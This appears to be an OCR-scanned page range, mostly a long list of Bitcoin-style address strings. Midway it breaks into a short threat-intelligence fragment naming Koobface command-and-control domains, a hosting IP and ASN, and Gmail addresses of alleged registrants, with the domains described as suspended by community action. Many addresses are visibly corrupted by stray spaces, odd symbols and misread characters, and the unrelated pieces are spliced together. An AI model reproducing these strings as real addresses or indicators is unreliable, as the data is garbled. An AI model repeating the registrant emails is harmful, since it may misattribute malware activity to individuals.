LOtNyMNlekvvWDQCv5Up25wg4jxnwwhRgV 
19tPW8aHXXRedxeCb9YAbx3rkAAeXrg7js 
19tsgQFZRf12kS5esvcWKJZPHKNaPLAXa5 
19tSkYyKYQpmdVsLh1S2HLBQzC1jAhp7BW 
19tSq1tExnD14h9eiK6kKq2Kiz4EcqASiH 
19ttKvVv9SKMIVTWbZ4iLYPJhL4SZbzEbA 
19TvmB4X37qyQJkdM714CvKX933NuKyri2 
LOTW2hThH8RtXgmTw2w3nPEfLQM52SyWrYV 
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19TwcpAkMZmkkwNf8QqNX8kF9AErP9jLP7 
19ty8RhZRZnMvPaQNfVexWgHFeuQGanWAx 
19tYgMyCmH9dxkgfkhRV57U7NGQK4KYFhX 
19tz3QEcZd6V8tzWAKPoE8vzRYZ95MFeb8 
19U44vQAPhuCgjrg8pXVSjLGEXrWp7w7Hd 
19uU7NR1YNSQY6SEPsiVVhFM7cMSWnEfqkK5 
19U7Va4Nb9v6qVgMCi3UycBwFezQQ4VGVX 
19ua20hqKutoVKYMcebZzxb6AVDNAtvwdh 
19ubcYrvjWHejrJ5uK8tmqmtrtKixUKn3U 
19UC3NLbtKe3F5RRCjJFWaN24hZk7L6cfg 
19UGkvGmsuyuD8u56hZmBgu31HEA383b3s 
LOUHrZgJtdGL7jxUjhz4UoCPezNERxuNXk 
1L9UhHURZHNYRribYKH59wAymDd4HecNuron 
19UjnTV47TiILEMGcdKdq2ja4NN8rxXz5a2D 
19uKVgbuwGTAQcSpateEUzVtdm9itW1YS1 
1LOULR5gjTqQEkBezej7q31iriFghRiRecm9 
19unkT4AnW6UPsbAZrifzm3d5NgKFarYAr 
19Upacrf25ewg29CGZ8ejXPmatr6Mt83wF 
19Upz69aKZpox7QdEGY2ECS1bQq1twig5] 
19Ugor4kZp2DUdr11WSjcg7gtNQ1kaRIJjA 
19URAxstbHYb7t7vAJssBBGUErxXanBWXnt 
19UtbtEFNQuwrMANAMh19cg1ZdF9Zc8F3f 
19UU8pMJZ3jKJgfsWGqFwdpMPPdM TrsE2e 
19uUS9VrZafXWmrNZrMZTpTj287)xXtcR4e 
19uwGboAneniQxq4T8uvVCUxvdvGut7 MWB 
19uyXf5dryPZhixzEZ6bj6tyRvOSNCGWAP 
19uzA4cR4UYJ3LENX3xx3aj3TrzDkf17ZF 
19UZvVJUcpcvEk2HjESxsqRy8nEHRrimbq 
19v2E5gJu5nFQJJQjCpdBnbHSibx9S Ty2f 
19v3QWGDW8QyYWmawD1jhtJ6UNfgKMe3M 
19v9gVczePWq2o0cpWAPWoxviMiir6MDbfE 
19vANKHQ1MYwRRjFBMFLWzSYgNaySNDh4J 
19VanwcyQt8N7EaakBVgyyFKDaXFXJuPTU 
19vatKMPSaLrQuqURM7Kyc6ze8Meswai8Y 
19vbcJGjVxe5ZK57L503r9ukRqLmeKGCSh 
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19vcs1RtbqQvrgMZ1XhEFGCdyCzPgmTk6n 
19VDuR8wSCZMUVNDNSxx1xsMwzRrL2XyMX 
19Vek5Hhqxkxk71H1pyt7Bu5x6nFfVcsEw 
19VGCSP98RFXW7HLPx4jdS2Q6yyQYuQMf6 
19VgfMxqvswwBjHGeG4MBMp7Bpimg3yUmu 
LOVHj482sLSHweyb8r1TSm1dLWwkLeQlAa 
19VhpK9RID28UANX8SATNrV4sveH7D4Xf1 
19vjvHge6gmu3T21BUJKohQji3nu4Qm6ji 
19VkWGSjuMveYH51U03d24nkwSgVv3ViA2 
19Vn4G7v2ZUB8pWLRZMEojaNv87ZFGoJT9 
1L9vVojJgNyFWGS2FFw2XTZQmSaldWrvwhzis 
19voZtkkiDX2L1kPnTjSpa5QeWA5cHQkXW 
L9OVQyyP9QxaxUWwR68QTZBTKQ8RUrpGFRx 
19Vr7j|KGH4FL2pZz24fVYfY LRxCBv9HSJDK 
19Vu6up6UVat73WWuqKg2sxLxWxy9uTfB4b 
19Vu7gAHMNa21Csc4RVcgaff¥gSMdXkzz5 
19vuetwpfPmMD9EE1Bru7NZbrLQiyCw57JY 
19vx4wqZsdbgFdSPjw4k4g3yMjzZVzgvDm 
19vxAYGPu9DhDgwD1EP6vevEMQjEF6MgjP 
LOW2TZFIG8LSDW8w8gbBé6éCtViIYPB3nUgNC 
LOWB19vF5LPtS3ZEiU7r49s32ZGX2gJiB1 
1L9wb6VWWLpTR3VMZQ4MrmJNjD3iigwpYys 
19Wem2PzT7BVyLYPxzcwULigX7ZotRoZal 
19wf8fM7QgMvzHY5GC1pRUF5TfcrJk9Pnt 
19wGDvzJToMVmcYZ1uUSDkKdU6WZMkYpSDcd 
19whjPmME7rSXFAHaeZaJKMC4DkmxzAzmPS 
19wk6SSRapxxGGZznYTinFHLQCvcowXLXB 
19wqjGqbbq4859AMwStvUXZakKYUXdRhCg1 
19Ws4qdf96LWZ6TUVBUihibwczxzpLWCHB 
19WsNme32JW3ifWZMBPV7mkX3kkkZxqcCY 
LOWTAS1X4gsVAiBjgZvezp2vtNxk3TEaoV 
19wtfz9gbgk86tCG25gVCcBJZy5injtcos 
LOWTNtX2PL53h3e0C6MEQz2gyFWVYYgM1z 
19wurh3sHFjJSORT8RZXV3iIQCAIZkspJoOHQ 
19wXqzPEb8BaoaTFt6VmFCitkBoQ]XbHHj 
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L9OWxycXH6K8TAZ8QBgnX8Rxo09PUU7KkfEa 
L9OWYtntWKkoZyLVKENXUUYDySTwQAM843X 
19WZ7ZHBGkvPcraAxpDPgT9L1SVZTVOHUG 
19wZgY5yBuGdJoADHHQgFTgdat9XBGRiFb 
19wzjvPuw8TbTjqwW7EafWzfaGH7mpDSj3 
19x162B3eTSxj7KHWUR1VZqY1D7jEEFLLE 
19x19DLUXwt8NSTQcaQ2Eycg97nQrYbGPY 
19X22s1uSNubpcBvqkzKPhYhfssstHTTk3 
19X6YnufnD7zsb9GPPmseeEHmGyY6ti5qzt 
19x7zZUeugU8PSbctaHYRIGA2W28Nv4TP7X 
1L9XbQtfAq6fsTYjvrrFqyR2ZJEZVAerYf25 
19XC4Jz5wwJ CN6m5ZVGXGS1c2DYGV6dGex 
19XCvjedLuYiApYe3mT3ZXN84HgUA2LvuU 
19xEpqC95WpUy32q8M53CCZKEaJVPwSDo4 
19XffhbCjtJZjKiBDZWF81E8smS9JGinvj 
19xgB6FrkA7gWJYSWLk2vwg1lksQ3yLmqBC 
19XH5t4odCnzGKU8f2LWiA3UWHVJ7PM9L1 
19xhezoeCdRfkArdQpXHxJEVxmJTpPk7FF 
19xhGhEgolva37TfuwrGTTn9XDPLSAeZHC 
19XhwaPBvya5odgYpSBnaRv5tHCvFcDfRA 
19Xie8CNgf7sjTD6V7iIC2sohXNoEyoo4eD 
19XjhizX Luyh5K4EQX8BiuUdypuoyHghbr 
19xL2tcZHnSLAJjYwykQLsbxnGk4Pc4WjP 
1L9xLx4NH5pgtVT1JshWPjYjtoCRFjJTMhs8 
19XNgDMTgt85dU5xUZGd7iFcwjM4bremKz 
19xnjatiWvkKEHZnULeWBczPkRWCq2YcZBT 
19Xnqk5GxPRxAV8KvBa5tud6s7hfBSeGf8 
LOXNWTJt9V6KtQ8wYyixe9FTYRQt6ruN2D 
19xTdWrdumabHqKj3w5HAWKQCZNthaBNMg 
19XvpNLEeeCsZ8P6ufF94akKo2hpAkDCXxLE 
19XVyGAd2TfzdlaBwiLq2Z6vBLUf459iB2 
19xW16uful1786fzJkK5HLSXidgPgZzAf77kY 
19Xy9SXiGiIAHk2wfF ftXBya6VvG53hU34p 
19Xydovrs9AAniLvk2FJMKCUxAtiPwxdk5 
19xZ1q44Fh8THuQzB2sERhJLRZ6VW6WvuR 
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19y3MHB2KOEPHMnCP42VigjSKqKpVZu7RK 
19Y4N5rPL6yJKCGN23qRKtZ84fh9KypfsH 
19y75FcjkfeXMYMc81Z6bkdVv6fDcPiZLp 
19y8jcC9qWXDXyQb1LqEv1BYQG2uCyTyzQ 
1L9YAMC4fexQqLW8WySwdiWMk8XFsuSUq2d 
19yb442cXo5upqGPr28D7h75Vk93u4AYD) 
19yb61KUBHNDWXnMg6sFEKES10hH27A3i5 
19ybcZF4AB4K8hDAPXtFtVBhccVAFP3fFZ 
19yBXtbZUtBfZoLPX4kXCLd3pd96wKU6Bx 
19YbzUvpgPTgDOBWNVKZEH2DtChY40yw8M 
19ydqnwa5sTEtfhliz45dQ1FeL2Dp1b41S 
19yfmRJ7Z2VE4L2HgVjjVe2MZXfXswXihA 
19yGdGPDa26fxfqraUTRwtZb7AgsUsxX4cT 
19YGdWKR49GKvzPeZC6ueNGj7DH1pBJ7NJ 
19YiJNCRAZYUDMHHbFAXxNpzr9u3DyTz6JW 
19yjJZ8eZgLEy8foB4JcMUeN5KEjbGvaEk 
19YkTcCFSkQ4gCpVM2eEaYPk15rpmxxH1qk 
19yL8gsQ39vSjQSnkeWkWzFPHmb8Rel1Htp 
19ymd3Ee3ROXS8FnFFsk6sqxUhEZFyVTzZU 
19YMHzf7zFfztfl Cq8AwA9cDLQf9faCN7o 
19ynDQ1m9nwLjyPXULA1QAXPvZ1SndxXdZj 
19YpkPsZhF966KuUbonhTUpTGW91qP6x1s 
19Yr9yFSST86y9PUE2ré6égjGJNaluvAzau7 
19YrHGfQ6ZLtq52ENRVpdgLBmERxkLfymq 
19ys8NVaJ8DeCLXBenpTT1koAukZzQ69c7 
19Yt2rNrZ4m2SuLT3GjQCHk7JvH8KaxCsj 
19yT4B4JTL372Ef4QiEGb6sJuCLMKmLzmq 
19Yu2Ee3iZSBbM8gHwCGqH6MdDgcgLaExr 
19yuQWsV2EGqYfTxdz5H3f49nwSYRVU6P3 
1L9YVAZwkFFhzgQkA5whA8N1WMVvf6Ey8mJR 
19Yvof1hBukSS627kx4E2uc2FNycEjbqBt 
19YYGk5yKj754xiggy2mMEzSkSQEwbgh9k] 
19yyJEQbz2bg92NR4NUjT18VUy1lvmHx2Hk 
19yYZ15icVDvY6S5L2cGMqutVnR7Pn4YtD 
19z1UcxPvBg304SdbuZn1GcFD6gB3sFzhe 
25432 


boomer-110809.com 


glavnij20090809.com 85.234.128.0/19 ———— AS29550 


h 
85.234.141.92 


piupiu-110809.com 85-234-141-92 static.as29550.net 


$uz11082009.com 


Koobface C &C, central malware campaign domains suspended through community efforts: 

- glavnij20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 

- kukuruku-290709 .com - Email: kuku.ruku.pam@gmail.com was parked at 85.234.141.92 

- superturbo20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 
([22]Super Turbo is yet another legendary product sold in the 90’s) 

- bombimbom20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 
([23]Bombi Bom is also a classic chewing gum sold in the 90’s in Europe/Eastern Europe) 

- mishkigammy-060809.com - Email: kKuku.ruku.pam@gmail.com was parked at 85.234.141.92 
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19Z3rxAPHTFevZCKAaK]5wNvYBuxdeMzUh 
19Z7r2bFVbMSqUX7vfHK1izy41Rrp3E11Vv 
19zBehFJnTEEmrnvgCnr3moCq4hZ6Sew4h 
19ZbQkuhMVpVGKj2FcHcddgQvrBxPDfsN8 
19ZdoySPEZCF7GKVwCmrmqGRinLfHKYoYM 
19Zdxy8gG74U8VnB64wbXeVgqGJcdiYQm8x 
19ZEJ4RRbgoCyHGNAJHDoXvRbw68]DF9ev 
19zg9VcpgqNjSu9sb4iC14s543sRycB3yf 
19Z2k22XMkD9yVNS6a Tupt3gmuYi7aB4quz 
19ZMkT1RhzdyuP31t3Q8jukyDRdGnWMk5c 
19ZnPy3DUT4VjnBwxXfP29ZbSaDCWFXnz5) 
19znYUivpwVrvAYvcW4LMs1tDL1RsQCKn6 
19ZoonSwWaPfz8]UhkJuW4GBesgagDDJxE 
19zq4nsds7XpT2Xza4qLdUtqQ6iVW6QByr 
19zZRYunMm7ChcSfWun8dFh22fZXsRUQjr3 
19ZsnUbxL6CZ0189m1loozgVWa7wSRpbpTV 
19ZUKR8P4RxtSeGTHSDSWWhFMq79yzs4i 
19ZVR3h7x1LFxRZaAtUkKEtN8MN4HEsKFpy 
19ZvyBee8qXN5ygUZngkf9wKVEdWkGCX7y 
19ZwT5usdY8BEGvKFtRPgJiQ6Knd93gYny 
1A13cc4DY6C5nEYPvNefyXyhbLp2kbSZZ1 
1A1BJC5F4ANGnLFJ3biSJoCSmeiUwsGjn 
1A1cQSw453KYBwkKhvfuckKSxh4FCS2dZNcq 
1A1CSd3pVq8wQSUCdhMnjJMZrEW79Uwdj55 
1A1dz7bWBiP8pyMirUyotQ|Jefy3gQDsn1 
1A1fJrrB8w7KT8Synfl1YtkmhvmfZGftv6 
1A1FPu8PMBZePQPGgzozGgqgmT ffXxuGEZF 
LA1LHVN6FYqJoPchqvW4CUhqsxZLqezA5CS 
1A1Jpbep87V7fa4qyiGjaGhF8R6kcJX9HK 
LA1kKDhQfhPw9YnyYQMKdJu2DXZTxPSZxaf 
1A1m6ZVJpN3HBnS82PokrHLjiZKYv9Or5kt 
1A1mcH1PRB2wkpQ4BL3WbZsSyWeD9QkZ2t5 
1A1MX32NHoaHBZJbZjt3gSbtLCXKHd8FJ2 
1A1pQq36vww65XbPHjF9Kj 7hnKPhEP5ACR 


1A1Q5vot7S41Uimu4CXaCcep1Zu23TV17g 
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LA1rUVvjVLWvUeBNHbxyur9ebs3p8UTKjL 
LA1TTCnrccquULoDMtjtrGMUTtLjV8j6zVT 
1A1lvVz675kKqwqhLYGTMHUKgYXPQNBFqkn 
LA1WLpFHfAxT8MyWiDU45FC7pDnrcQsib 
1LA1xFp1fN356xPgSugErl1TeZ7Nc4NDjhjr 
1A1xKmdjRgEPmBv7bU2WPpiVfXeMSt]RHG 
LA23HnNQfhMpjNeYTZa82ePDgnhmBKXUgQT 
1A249inm1KtMWLDKK24Gs68cFx7dz7aXUR 
1A24rxMNN7QNNdnUXiRGFCAAD4kE1vfSeG 
1A291eyoBBKXK1ImMEBPNAzfVZXkdoCs8RJ6 
1LA29VXrjlfmYiGb4LLU6Q2 TwkvKrmFgtBu 
1A2JskZUAyQi4XE2FXK9PdUJF6wMHRQpG6 
LA2Jv2YnVWZ3nGqFUaiSFKKVE2HdEXg6ub 
LA2KNKq82vkq61S5a8Wwge6NEL7Zbh9GRW 
1LA2LVKTfjtv8NTFXGBQnYCEMuoEi7mj3xe 
LA2NFtEDTo5ZEQe4q90LeGjak7x6UfQie 
LA2nfY¥mKjJKKcC6AWC7fJ9WNUHTAZ9SCntUq 
1A2P2D5b3VEnuJ21tDoE1TQ8ryRkX9CTBY 
1A2ptbLjp1RVMpRtZrofvXgSteMnsAy9g1 
LA2QhiiLNAnDpSio1PN7CTyeM2wyYS9psPu 
1A2to1l5aerjULgT1gZc7Fk2g4iGLEzoVD1 
LA2tsCSokeSZKa5WReiltjonFNKLZiYZCf 
LA2uUNTrqFsFrw5Y6jJRM7ZvLeZFqEgsif7 
LA2VrTUtBHg4ZA7mEv3YEEBNhfVgZmsdsN 
1A2Xz6YpDXEvMAQZzihLKS1HFqj7gmdbMsWw 
1A320mqs90w3GkugkKSaqUTYdmXzTEYPuBS 
1A36aqNP8hDpybP5xEg9wvzo4yFm9RUzpd 
1A3aJ5Xj2U3NhHLHGBTSKcscjqroisyY TutF 
LA3bhhV29mP7g6ZsvcMrkLYdmEVBhoYea5 
1LA3Exeah7ZdJc2SNsrhq67t38mMPqHLcQxP 
LA3gVPWQHtpNbqsMZ7pEKke6jMoTNfzCry 
LA3hNaqgTEjJCuYFnnybVEPDJPw7P7xGkG 
LA3JqkQok9tg3Wh1Q8gMNwrRU8cNXv3Q6W 
LA3qWUslLh80VGPV5u3CXNiLdyBygiRizJG 
1A3rdRUbgudNEVL56qZpjw6UFIbE9H9t7X 
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1A3uJLIgCvmpdyAHCpPhv7rVW6cERRaQWR 
1A3Vv4esLgtp7mVKthf2Wo51K6p7LjJAYDT 
1A4150ZyQnQWLi2VL7L5KjJzQldpzhmxXFs 
1A41mL30kLVoHZ1fNBhefyDSwyujWZ4e5E 
1A44Q5Zrm6QSaqfvTlywhVCLNpcyd1QYZPUL 
1A45ytP3tAcPw87YJnRQeAojJ6WY2YRzpum 
1LA4dMpfqgTTNSWUKier3t9aMajHr57yc7W 
1A4gemYhncwf78krmXxPgUK7fNV836GNGR 
LA4HGWaaRUhTGnKCSzdVysYwKKYG2uqj7L 
1LA4K9i1Yc2BmgQRfL6CywdNtmCeT XkqdGb 
1LA4KVURpn7BDLd8zeANDw9ciuFVEbAdAap 
1A4P2g6dR3bSF4fkHpwPC2UN7qmE7pcqzw 
1A4Sp1Z7cu3Fa6K9kxbfqN4kK9crENhxByK 
1A4TzaMzfepEGvbZKE2E4Vs2uH8vKe49ED 
LA4uEdfGKxHZp6aZPSFNNFx4Q1F9AAM3Su 
1A4uioayETpdcRJdtchpXRFT 7Tuu6qKSV3 
LA4wHXzGdnrjJ2b52UhxPtuGFBmFTTM2Ut 
LA4wNviidUy21kLyL8qssj96pYVdpdREBB 
1A4zBANKJzsjSWgNPW6sF 1luYbvcQhoaQLG 
1A51kyCpDDaGBLqKVAhfhxGLnkgGfkNpoR 
LA52jjio3Rtir6mz89fHGykVXgvXC9OHECM 
1A53JWHMLBAWMoS59e6qtppLgKnPgV3f142 
1A57CTHYA1vj7DY6eBBXBKQShv8RIGMBhd 
1A5aFRiaJ52SF9Ssuyh6eCbR4B6PUdINKX 
1A5aJFjp 7marmczndAGqbYCctREXoLwYwf 
1A5aX3m2C8wGsCUACNV8SkFaRcQYwtR9nn 
LA5DfD5kXTTWVwjUgApTPwoxqwnarxdQHf 
1A5eaM1vfPZ4NeSzv73WoQfFGmT6SFVyLD 
LA5finVcBKyZmqP1lgxEm9WX1tnHjJuYpNA 
LA5ktUEzeLd9GpDUbivuN6m4kKoZDJpé6hp 
LA5PKFpzNELN5t3dyT1xbTpWKAq9h8EiM8 
LA5roNGEEomoCeTYXuhymRYQYdCs1lhohnj 
LA5rQcDMQqH4WNZBXrgVbvaaga2EuCVW8r 
1A62UxPDVRNHopf8VQCosn444QT9CuRDc 
LA68HLFNHnrot64JxTugST8qtUbLL8CyTu 
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1A6cakYGv4QGHL1StazDQZ4xkYdb1liY2GA 
1LA6CnWbjGPLgdUkjzsQGjJF5NM1U9QVLoK 
LAGEt3GixXHZrxEUjJEBUCyQJF7RpDSqGU} 
1LA6foHe7YSwMSO9nNkjJMaqjJsjNFC8gymsr 
1LA6fyvJYBOSbvTNLGYJNjdBtm6yskK5pW3N 
1A6gzd9ZjBiysxKalvLlqvidrjFG7tdaxC 
LAG6iIDDrjFWB64gHW9jC5x1lycS1zZ2KoidW 
1A6mjbgX88ZmMqWG8XbRLIAa7Y1LDZWogZpr5 
1LA6QcZ3dH14Z3cWYYM4oqgSgcKB6GBi9KVr 
LA6SqHdEvGfuKVN7wvHeAUE9mzevr1BQ1A 
1A6tWaT9eUzZeMsBiCtrxtMsnYwEEPoBx8r 
LA6VhCUWBKQMZzkqd7jxqAZajDKDDMAded 
1A6Wax31ZkdhPskK2jX2ZEdLBh4vj5FR5S4 
1LA6xdNtg5SRpxHKBS6gvdBQNTyjrKQdx2Q 
LAGYEXtKFXLErv2Hrw5xezuTizj6Le6JPW 
1A72xtkeNJB62DCPENTTfd6dgyaqUSx87P 
1A75Q2nfrdCiC6yzs9Qo9TviCil1C49as1P 
1A7AysoBz8uMyCh9BMRSeLGFhcAHi/7rBHF 
LA7EwX48sSv59ZNPYNQQ8eWDCmCygnmBvD 
LA7fpNjKkLadfNrwGr4JQEVNjfLYjbsLs9 
LA7h86dhc5vuQjJ4N5KbWzaeP81LhHTK7NTv 
LA7hyCT25c3dTSKVxj4jlLocFenUa2dNu9C 
1A7kdFa72YckSrc8bBDvzhUSPUQEHLYXBT 
LA7QF2ketiN2SMzNuvmX1gAAhG99MRJk9Z 
1A7ranPepaK7DYererDGeaaXbukBYdqA7A 
1LA7uZTgkvLNp7wFPe9v6pqwZZbqc5HNeDV 
LA7ZFnNGJFPNCLSnjiMfs3D1hpzesxtzsiv 
1LA85Rg6t9uUMHOBSzZ6gfKD4Lxw5 XbpyEiop 
1LA86dXBQMHuRY6G7mXnsQsSEmuoDFkiepP 
1LA8bRQyAwtsrvxQ56eQiWdT To3JZAaa097 
LA8Ebi3qorp2ckpsTmbwpsJY8vJJY90uZx 
1A8epUdeMnkKjsfkcHm2kBVdQgzTCWDESco 
LA8FF5cVtmJSzxrLnE7KVurhme5PsPfL5Y 
LA8Hqyo5JuQEZcjsxdiE91EeygWF91dDPb 
1LA8JKBMk2EhdMLyKjTJXwUpMiGjwDXTZaL 
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1LA8KokH2w34Wo/7FzVr7eiNVNzEeoxPqbT2 
1A80yeyXo1r1xXyEFAgqJ/Q8MUmzdzo6iaY 
1A8p68v8e]YoIASMxUPKFE8Quec6P3AbES 
1LA8TjtfzxgpABvDSyelePe37NMA4RjANf89 
1A94DUhpGgaYqDMdqPVYA7fHHx32M1DD36 
1A982DN8TsuEGQNy5bielg64cAzSVAKs4u 
1A9eixCRYZ2yanyw6T XeroLQ7GWgg1leRK 
LA9eV9qjpEdqiPDdJqF3ZTK7 UUmXPrF20k8 
LA9fLjaxBVkKWAmwEmmwj3nEQJWqcQ2DvBY 
1A9MA2e64VuxTG3SLhhWf2qfHCdtw3v9jL 
LAOPLULbDVvkovggNTRUjcT2ZkKMlogTNa3P 
1LA9rCJMNiPCK3GJGtzUEEjoRVN7XmM9n9Z 
1A9SevBUns1jxw4UwNmPqEA6jfGBFdPSH9 
LA9YSNY7gBNBom5ZChTRjABJTrXEDsMiiZ4 
LAA45FcZQzWgaqaiVarfjdwDXkFuhQWoavfg 
1Aa4xn818EyFFdrhb5cs4DySUbjRJP4bx9 
LAA4Ywuv14DDYRxtNBpjG32FrcX4QBB8Zt 
LAA7fUI58hAKrEV9S9KAWAG6EceWeTiq9XS 
1Aa8UTnbkpCq3ym54kDgil4MUvnM1AQCQU 
LAABcHCRJsgc7D3FTWa524bgrFeN9VK9BE 
1AaCoA8kFZxqu6mL5VaWzkUYuQgkqbhP9x 
LAAdPLiXZcxR1H7KAgAtnEpcwoh9Ed58D 
1AaFAywg1ZkP9o0u72tzRRAfP3zJJvDa46F 
1AaGXKPCLr41YhDxLigTghWKh32BXSCjnX 
LAAL8AWQJkh436gQUojvxDBUUKGM7K4TUu 
LAAmK3dPo03e839HMENRD5YtivTL6GUFJXZ6 
LAANNhjN3hE27bcB1pLxctX4Zcmvk4mU9Z 
LAAptGG18hxvfkpymo9KgM6n9HX5b7RG88 
LAARJ3tCb1EE4ggkLwSabtA5Dd3LwHLzfZ 
1AasisNPshuGH6aZimvrgV4usZrLgdRGWN 
1AaTWPTRXDR78c8ZwWE1vE1kzFkiv43Wq7U 
1AaUbiSkKey8dFa94ikleoYyzG3bw8cVVV 
1AAuvTUSGCi9Ddkh9begNUJaEpzMJYPw3V 
LAAW9AhPFREXjKHGbJd74ygjtb7JUB5ruY 
1LAaWx7VEMEagng2b7n7VjJS28xCDfynZ9eL 
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LAAXGiBP6Pu8jHpfPxfaq6xXpVBAUSHf6ws 
LAAXgMJVDWBBkWH506MtWLmx7yREhAxhiA 
1AaXPF1T5voumVMHzXSwRnalVuGPRJ3yud 
LAAyN4U6Jheqc7Ax8mkta4GdzC3g3jzntz 
LAAYpV8tH5fRDIE3JaFnxKJjBMAQchPMUn 
LAAyZv2Ny3Wr] 1qbfVBy11U9QJGZX7mC6x 
1AaZ1fujQLDcYfHy6aUEKVawjgpNkleG9d 
LlaB1lnD2mgy2bes19JxsVKWFTAji3P165L 
1AB6g9wtLz6gslpxeSYrMq1WuFAYNcBH6e 
LAB8Hvc2G7K6KQtqasxX7LgKJnDjxhtZ71T 
1LABcsugiSozoUkqwugXCP5JXrcF1CHbz1G 
LABd1xKEYTyM6Et2C6XVxuQ90WQEBbQ7fd 
LAbdK8pd3J5FY1V8xKgp2uiN4Bi8P7YXUa 
LABEHa8Zo5EE3ZAKEQAgWtraf59xbGCv87 
1LAbenVq1lQxvG1lolojCWCqE7545aC13kg9i 
LABHoutRx1d5zBx4r4xistD6bA6omLTS9h 
LABi6YjusiRUUy7UR2crvGgYAtgSMrm5GX 
LAbJGtJz4eZHuNcjGP3EiMdtuJAqt7FVwg 
LABKYqsfbbwiG3xsqhvHWWFsbkxngdpNdN 
LAbLgGHoo8AgQUM9TIQY9rHYngxXpW9GvhQ 
LABMEad1Cy7FHRasC8a79t193p2dX9N6sP 
1ABn544ZV7c4folWwfeMyDVwUwdhew9Ywx 
LAbNpnkc6MzucRUoZKezqmQCUpxF8pvbEG 
1Abou8Doqr8MUe2mwgqZMYtZTnWyPFZSijN 
LABgBlouxgWf37cH9UDtZMhSgM3WPdQQLM 
LAbuA2wRbVCbJw1LENZWgkFzo096XPzVCVF 
1LAbvbhfaWBVX8eQN3NojjbAFboZgQUFdZR 
LABVu1GdcPZenF4SKtAB25PxpQsxwahMyn 
LABW6q7KaGnjAiEZtuHZc5H28e2qjTb59X 
LAbwRPWWYNUB6Xk9T4zx90KF6pzb8h1d2a 
LAbWX6tVRjW2Ba3HbWBEskP6ufBaQqfUYn 
1ABX1EVQx73PmFzwzhxhdvn8AuLQG3r77t 
LAbyNErun5GAvXqXRBcxvAvxo29Rfx9GwQ 
LABZEQMxVpZ41UmmrtLi9RSsuwMryiklEe 
LAC3g59mryhRXPikKcjzWEuWDG69unuX8Nx 
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LAC5pUyTwxK45njLytRSALmgLyYY8xkkET 
1Ac5qSvXLhsZeWLMADfUpnx1Pzo5MmLLj4 
1Ac68KdaAi8CxXjcEvwnGhFYrpHtxnmpjwyY 
1AC6j3BtiCvulCMvkP67CG4BSBZLa9pq6r 
1LAC7XGgfshcXzZKHxtwF limk6uegEmcgQyu 
1AC8ZLD2baBVD8BJ8XFfq6dM4FzT6W7FG3 
LACAco5zPbyUaTQU40K5WXMmL8RybFWv3w 
LACaDY6gaYQM3Tt30U4XZYncpxjQgEV158 
1AcAmzDrGemXMLBiMUTL1peiLV6e0Kkg2k 
1AcB2TPazpJuUMRV7Dom9DCdZua8st6BCjV2 
1AcbGS7bRkyyPtDVkCZKXnkYoe8Xm2VwmE 
1ACbuwsUkk7W4Qcfc6kPP4mME9M5qQ18Uic 
LACC7H3PAwZhResf7ZrqDBs9wpK618iGVK 
LACCx]6y75uEZZ3bkgDODDXHKKmMkz2nFT 
1AcdZLxT8xjrtTezPBxCaE6e3was8JP|xX 
LAcehwVvrL2Q2VbthGaNntVjwEkk9BKgqv7 
1Aceu9sgTigxCD6Q2P1jBGnBNdczikWFsp 
LACFChakktNvUVt39dPZYd5AVMRctZqP2h 
LACfXJkwg8RrxXrUauP9XdgfGFQVECHVRTU 
1LAcGF9rBDfxn9qBcxXT4pYRBX5 ThoA1VnEC 
1Acgm7Hkb93t3YSE8HXSgPPRkCdMSuythP 
LACHMWFNHCcZEBUxLs3ERh1XnPemkKjJGzZG 
1ACJ83c45bxN7GE3iH66K116mGinHGuVaU 
1AcjSaepy1098x8v2YzyTHNtoljQiP4uqs 
1AcjSZr5M6XdwsiDwVJf8BcKys4dDfhL4d 
LACMsPtwcZA38EW5xwul QJ7Jr8742iNrZx 
LACp1PtGzwxSyxK8dnnNzfPqk7JjFym1imx 
LACPyNHoaaVkKkFAjraJAc8rBai45yfCTHU 
LACRCZH1IMLVkbA8L18GfME047RRO9rSspa] 
1LAcRgp6wCEbVnA3j1liTidGkvBR4Cs2Sd3g 
1AcRUzD4ydNittij2ETccnlbveNRS3FpaB 
LACTjaHY6NMUyHtKL189pzdVNgfF3CqV5U 
1AcuJQ5c3hPg46phjxwM9WbbPEaf2x8Dsv 
1AcVehokf3gSZz499bXU5 Ty8JthGVwZwNY 
1Acw2eTpjJEdYXpXBaEnqtn74u73m81CVLF 


25439 


LAcw8AUL4voAb6im6fMU587gexkoWV2Dsy 
LAcWb9TkuZNvKg9XT6ARAS9ZUP5 3yoo0aEY 
LACWU7S35]Ket3Nn5DQm6CgrnXexwxgbQy 
1ACwz2DyoLE5gkDQtAx3BRXLvBi8LS2Ftr 
LACXr9U3uwCd2hEAHVT 9AGKKK6EixJnaNh 
1AcYocUmUys]VuFhAZt2 UGDSzoaSpgPd9K 
1Ad2fCRr5qdWCbULGNEjkAz558e6r2a23i 
LAdAQ3ZZHNZzwwk8u3x4bwuggQaqLT pxXe Off 
1AdbhDHUo6LaEirHXsbcKg9BsiuKFPo6Uu 
1ADccB3CRzea3qiKEeeczjNavWKiGaAHT 7 
LADdfFPbgsnW6fkJTAYMHQDv2NsvmRwaaQ 
LADEh9XUaMegTkZnU1Y1WLqcGHg6Ng6CTQ 
1AdeHsocAtHwk47rc4xP4L7bGGXtpTMEY9 
LAdEixaywnPzwrTJiUgQ6CBSZWvf7HRz8x 
LAdFtq2C9ymvfUgq992Squ7jbAGM9VYorhN 
1ADgCm2p7nn2W7teqB8WGTkeZcbSrqF1RR 
LADHCA8Ty3F CgAEM6UjsZPDWjdbQPgP4zf 
LADhcq3aEhJM86YedzCEzyjpG4HHfjXjQE 
1AdJcCdxDcLfBZ1hbXzLwaDU74R6ndtwP3 
LADKEtdPk4RB5uiR5rgA8qj4kfxJvCx63E 
1AdKPRTZ29mGxTyLvgV91w18qDGyjQDqb) 
LADmujHgYjdsW26c23fN9X2wWRIAMNBSXB6 
1Adny1T6qkKbbBhugjpaJoa2w9Ya7hr3Uh 
LadoJYratfkmxh2GLVIN1hUjQzmRfy95W 
1LAdQBBcit8sHrPTY2hHW2fTPHzZaECBF 1in1f 
1AdTby8eazxRCppFnAAZLyZt3VRipZoDQk 
LADtNaN9a5hooDsERYbXRJ12Cy22aycgVN 
1LAdtxHpF6RXFJtWk3eyXenmj4qPFz75tUR 
LADXQ4eg TwubKeiWj2ZPxzPwCvTqkXg7Hj 
